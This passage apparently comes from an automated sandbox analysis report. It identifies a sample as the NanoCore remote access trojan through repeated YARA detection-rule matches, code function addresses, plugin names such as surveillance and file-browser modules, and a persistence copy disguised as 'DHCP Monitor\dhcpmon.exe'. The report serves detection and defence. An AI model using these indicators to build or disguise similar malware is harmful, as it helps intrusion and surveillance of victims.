        Source: 3.2.bGf2H3tXGg.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.2464158.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.2464158.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_004069450_2_00406945
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_0040711C0_2_0040711C
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_2_0040A2A53_2_0040A2A5
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_2_0225E4713_2_0225E471
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_2_0225E4803_2_0225E480
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_2_0225BBD43_2_0225BBD4
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_1_0040A2A53_1_0040A2A5
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_0040A2A514_2_0040A2A5
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_007FE47014_2_007FE470
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_007FE48014_2_007FE480
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_007FBBD414_2_007FBBD4
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_051BF5F814_2_051BF5F8
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_051B978814_2_051B9788
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_051BA5A214_2_051BA5A2
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_051BA5E414_2_051BA5E4
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_05273E3014_2_05273E30
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_05274A5014_2_05274A50
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_05274B0814_2_05274B08
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_1_0040A2A514_1_0040A2A5
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_0040A2A517_2_0040A2A5
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_0254E47017_2_0254E470
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_0254E48017_2_0254E480
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_0254BBD417_2_0254BBD4
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_051BF5F817_2_051BF5F8
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_051B978817_2_051B9788
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_051BA5F817_2_051BA5F8
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_051BA61017_2_051BA610
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_05393E3017_2_05393E30
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_05394A5017_2_05394A50
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_0539533017_2_05395330
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_05394B0817_2_05394B08
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_1_0040A2A517_1_0040A2A5
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_0040A2A522_2_0040A2A5
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_009EE48022_2_009EE480
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_009EE47C22_2_009EE47C
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_009EBBD422_2_009EBBD4
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_04FBF5F822_2_04FBF5F8
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_04FB978822_2_04FB9788
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_04FBA5F822_2_04FBA5F8
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_05253E3022_2_05253E30
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_05254A5022_2_05254A50
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_05254B0822_2_05254B08
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_1_0040A2A522_1_0040A2A5
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: String function: 00401ED0 appears 92 times
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: String function: 004056B5 appears 32 times
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: String function: 0040569E appears 72 times
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: String function: 00401ED0 appears 92 times
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: String function: 0040569E appears 72 times
        Source: bGf2H3tXGg.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: dhcpmon.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: bGf2H3tXGg.exe, 00000000.00000003.246102412.0000000002CAF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMyClientPlugin.dll@ vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNanoCoreStressTester.dll< vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSecurityClientPlugin.dll4 vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAForge.Video.DirectShow.dll4 vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNAudio.dll4 vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSurveillanceClientPlugin.dll4 vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 00000003.00000002.488999685.00000000023D1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameClientPlugin.dll4 vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCoreClientPlugin.dll8 vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameManagementClientPlugin.dll4 vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNanoCoreBase.dll< vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMyClientPluginNew.dll4 vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMyClientPlugin.dll4 vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameFileBrowserClient.dllT vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 00000003.00000002.493192985.0000000003464000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 00000003.00000002.493192985.0000000003464000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLzma#.dll4 vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 0000000B.00000003.288368251.0000000002B16000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 0000000E.00000002.318707635.00000000024E1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameClientPlugin.dll4 vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 0000000E.00000002.318765961.0000000002530000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 0000000E.00000002.321173219.0000000005240000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exe, 0000000E.00000002.318855204.000000000351C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLzma#.dll4 vs bGf2H3tXGg.exe
        Source: bGf2H3tXGg.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.339334436.00000000034CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.339271124.00000000024E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000011.00000002.323984965.000000000359C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
